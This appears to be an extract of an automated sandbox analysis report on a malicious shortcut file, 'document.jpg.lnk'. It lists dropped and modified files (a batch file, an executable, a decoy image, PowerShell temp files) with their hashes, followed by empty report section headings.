C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lz1sabhd.e23.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muyou3cf.is2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nke5tatl.yql.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxegjbbo.vpi.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0av1kme.pyk.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvwiqscy.ntv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhw3ws4v.zlu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\r.bat	ASCII text, with CRLF line terminators	461D2A5606531EB4430C875111174D56	CCCB62C32EBDB9EFB8EFCBB16BDD23920D913A4A	CEB6C3B25F013030BF8CED8BF9A33AB0A4BF5FDB43657742D16110430E9C122C
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)	data	994BCC8F082F2322DDEB5BB22439B495	9CF281603549EE0602272B552AAC0A6719C9C5E9	DA2A6B77FC6A59A07A7887CEDD6A9CF93ECB294AA141046FD5DA93005DBDE88E
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5c222e.TMP (copy)	data	994BCC8F082F2322DDEB5BB22439B495	9CF281603549EE0602272B552AAC0A6719C9C5E9	DA2A6B77FC6A59A07A7887CEDD6A9CF93ECB294AA141046FD5DA93005DBDE88E
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\67M7P0PNVSACSNW7Q2KH.temp	data	BC024EB4781E85BAC59ADBAAF7D1D328	3C7B97A513FD3BE41260DBBBCD95D0D9B9691DBB	E1D3B532060C95F394B64941A1AA1C43F643817515D4DC1D7BBEFFA0CE16E9C5
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQMJU6NIXI1BRPTECC69.temp	data	994BCC8F082F2322DDEB5BB22439B495	9CF281603549EE0602272B552AAC0A6719C9C5E9	DA2A6B77FC6A59A07A7887CEDD6A9CF93ECB294AA141046FD5DA93005DBDE88E
C:\Users\user\AppData\Roaming\document.jpg	PNG image data, 799 x 1120, 8-bit/color RGBA, non-interlaced	65601E7EE8BF4F72A913A9B33D8AD68D	903A6B0C5661D8F14934D9553D3B8B970752E90D	4A529CA9F64BF819D11987C09D9F2242BBB1A63C8BE4DF490EE276F7DFFD81F1
C:\Users\user\AppData\Roaming\tiago.exe	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows	41B99B0770F01AFBD80481FB6F811BCC	58EE2FB1672B3AF2DB7997BB91CF3AB138D801E1	D457B15DFCDD6669D60AF6D96F56757674B6F0FBBA11999F76F47E03BD635D09
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
\Device\Mup\user-PC\PIPE\samr	GLS_BINARY_LSB_FIRST	E467C82627F5E1524FDB4415AF19FC73	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540

Windows Analysis Report document.jpg.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
document.jpg.lnk